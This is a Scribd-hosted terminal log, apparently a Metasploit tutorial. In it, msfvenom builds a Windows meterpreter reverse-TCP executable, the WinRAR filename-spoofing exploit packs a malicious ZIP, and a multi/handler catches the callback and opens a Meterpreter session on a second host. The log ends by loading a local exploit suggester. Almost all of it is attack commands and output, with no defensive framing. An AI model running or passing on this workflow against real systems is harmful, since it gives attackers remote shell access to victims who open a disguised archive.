Scribd
Upload
187 views

Metasploit Tuto

The document details using msfvenom to generate a Windows meterpreter reverse TCP payload and encoding it in an executable. It then shows using msfconsole to search for encoders and the WinRAR name spoofing exploit. The exploit is used to generate a malicious ZIP file targeting the vulnerability. A multi/handler module is then used to listen for the callback from the payload.

Uploaded by

jhj
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
187 views

Metasploit Tuto

The document details using msfvenom to generate a Windows meterpreter reverse TCP payload and encoding it in an executable. It then shows using msfconsole to search for encoders and the WinRAR name spoofing exploit. The exploit is used to generate a malicious ZIP file targeting the vulnerability. A multi/handler module is then used to listen for the callback from the payload.

Uploaded by

jhj
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

root@root:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.

112
lport=4444 -f exe -o /root/Desktop/sk.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the
payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/Desktop/sk.exe
root@root:~# msfconsole
[-] ***rting the metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***

____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]

=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

msf5 > search encoder

Matching Modules
================

# Name Disclosure Date Rank


Check Description
- ---- --------------- ----
----- -----------
1 encoder/cmd/brace low
No Bash Brace Expansion Command Encoder
2 encoder/cmd/echo good
No Echo Command Encoder
3 encoder/cmd/generic_sh manual
No Generic Shell Variable Substitution Command Encoder
4 encoder/cmd/ifs low
No Bourne ${IFS} Substitution Command Encoder
5 encoder/cmd/perl normal
No Perl Command Encoder
6 encoder/cmd/powershell_base64 excellent
No Powershell Base64 Command Encoder
7 encoder/cmd/printf_php_mq manual
No printf(1) via PHP magic_quotes Utility Command Encoder
8 encoder/generic/eicar manual
No The EICAR Encoder
9 encoder/generic/none normal
No The "none" Encoder
10 encoder/mipsbe/byte_xori normal
No Byte XORi Encoder
11 encoder/mipsbe/longxor normal
No XOR Encoder
12 encoder/mipsle/byte_xori normal
No Byte XORi Encoder
13 encoder/mipsle/longxor normal
No XOR Encoder
14 encoder/php/base64 great
No PHP Base64 Encoder
15 encoder/ppc/longxor normal
No PPC LongXOR Encoder
16 encoder/ppc/longxor_tag normal
No PPC LongXOR Encoder
17 encoder/ruby/base64 great
No Ruby Base64 Encoder
18 encoder/sparc/longxor_tag normal
No SPARC DWORD XOR Encoder
19 encoder/x64/xor normal
No XOR Encoder
20 encoder/x64/xor_dynamic normal
No Dynamic key XOR Encoder
21 encoder/x64/zutto_dekiru manual
No Zutto Dekiru
22 encoder/x86/add_sub manual
No Add/Sub Encoder
23 encoder/x86/alpha_mixed low
No Alpha2 Alphanumeric Mixedcase Encoder
24 encoder/x86/alpha_upper low
No Alpha2 Alphanumeric Uppercase Encoder
25 encoder/x86/avoid_underscore_tolower manual
No Avoid underscore/tolower
26 encoder/x86/avoid_utf8_tolower manual
No Avoid UTF8/tolower
27 encoder/x86/bloxor manual
No BloXor - A Metamorphic Block Based XOR Encoder
28 encoder/x86/bmp_polyglot manual
No BMP Polyglot
29 encoder/x86/call4_dword_xor normal
No Call+4 Dword XOR Encoder
30 encoder/x86/context_cpuid manual
No CPUID-based Context Keyed Payload Encoder
31 encoder/x86/context_stat manual
No stat(2)-based Context Keyed Payload Encoder
32 encoder/x86/context_time manual
No time(2)-based Context Keyed Payload Encoder
33 encoder/x86/countdown normal
No Single-byte XOR Countdown Encoder
34 encoder/x86/fnstenv_mov normal
No Variable-length Fnstenv/mov Dword XOR Encoder
35 encoder/x86/jmp_call_additive normal
No Jump/Call XOR Additive Feedback Encoder
36 encoder/x86/nonalpha low
No Non-Alpha Encoder
37 encoder/x86/nonupper low
No Non-Upper Encoder
38 encoder/x86/opt_sub manual
No Sub Encoder (optimised)
39 encoder/x86/service manual
No Register Service
40encoder/x86/shikata_ga_nai excellent
No Polymorphic XOR Additive Feedback Encoder
41 encoder/x86/single_static_bit manual
No Single Static Bit
42 encoder/x86/unicode_mixed manual
No Alpha2 Alphanumeric Unicode Mixedcase Encoder
43 encoder/x86/unicode_upper manual
No Alpha2 Alphanumeric Unicode Uppercase Encoder
44 encoder/x86/xor_dynamic normal
No Dynamic key XOR Encoder
45 exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 normal
No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
46 exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great
No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer
Overflow
47 exploit/windows/http/novell_messenger_acceptlang 2006-04-13 average
No Novell Messenger Server 2.0 Accept-Language Overflow

msf5 > search winrar

Matching Modules
================

# Name Disclosure Date Rank


Check Description
- ---- --------------- ----
----- -----------
1 exploit/windows/fileformat/winrar_ace 2019-02-05 excellent
No RARLAB WinRAR ACE Format Input Validation Remote Code Execution
2 exploit/windows/fileformat/winrar_name_spoofing 2009-09-28 excellent
No WinRAR Filename Spoofing

msf5 > Interrupt: use the 'exit' command to quit


msf5 > Interrupt: use the 'exit' command to quit
msf5 > exploit/windows/fileformat/winrar_name_spoofing
[-] Unknown command: exploit/windows/fileformat/winrar_name_spoofing.
This is a module we can load. Do you want to use
exploit/windows/fileformat/winrar_name_spoofing? [y/N] Interrupt: use the 'exit'
command to quit
msf5 > exploit/windows/fileformat/winrar_name_spoofing
[-] Unknown command: exploit/windows/fileformat/winrar_name_spoofing.
This is a module we can load. Do you want to use
exploit/windows/fileformat/winrar_name_spoofing? [y/N] y
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(windows/fileformat/winrar_name_spoofing) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set FILENAME samk.zip
FILENAME => samk.zip
msf5 exploit(windows/fileformat/winrar_name_spoofing) > exploit

[*] Creating 'samk.zip' file...


[+] samk.zip stored at /root/.msf4/local/samk.zip
msf5 exploit(windows/fileformat/winrar_name_spoofing) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread,
process, none)
LHOST 192.168.0.112 yes The listen address (an interface may be
specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.112:4444


[*] Sending stage (179779 bytes) to 192.168.0.111
[*] Meterpreter session 1 opened (192.168.0.112:4444 -> 192.168.0.111:1849) at
2019-07-26 08:14:50 -0400
[*] Sending stage (179779 bytes) to 192.168.0.111

meterpreter > background


[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

# Name Disclosure Date Rank Check


Description
- ---- --------------- ---- -----
-----------
1 post/multi/recon/local_exploit_suggester normal No
Multi Recon Local Exploit Suggester

msf5 exploit(multi/handler) > post/multi/recon/local_exploit_suggester


[-] Unknown command: post/multi/recon/local_exploit_suggester.
This is a module we can load. Do you want to use
post/multi/recon/local_exploit_suggester? [y/N] y
msf5 post(multi/recon/local_exploit_suggester) >

You might also like